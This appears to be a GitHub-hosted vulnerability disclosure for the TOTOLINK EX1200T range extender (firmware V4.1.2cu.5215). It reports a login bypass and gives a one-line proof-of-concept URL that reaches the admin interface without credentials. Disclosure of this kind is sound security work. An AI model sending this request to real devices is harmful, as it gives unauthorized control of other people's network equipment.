Skip to content

Latest commit

 

History

History
18 lines (9 loc) · 390 Bytes

totolink_ex1200t_login_bypass.md

File metadata and controls

18 lines (9 loc) · 390 Bytes

TOTOLINK EX1200T LOGIN BYPASS

Vulnerability Description

PRODUCT: TOTOLINK EX1200T V4.1.2cu.5215 (latest version)

An attacker can bypass login by sending a specific request.

image-20211021180828521

PoC

http://[ip]/formLoginAuth.htm?authCode=1&userName=admin&goURL=home.asp&action=login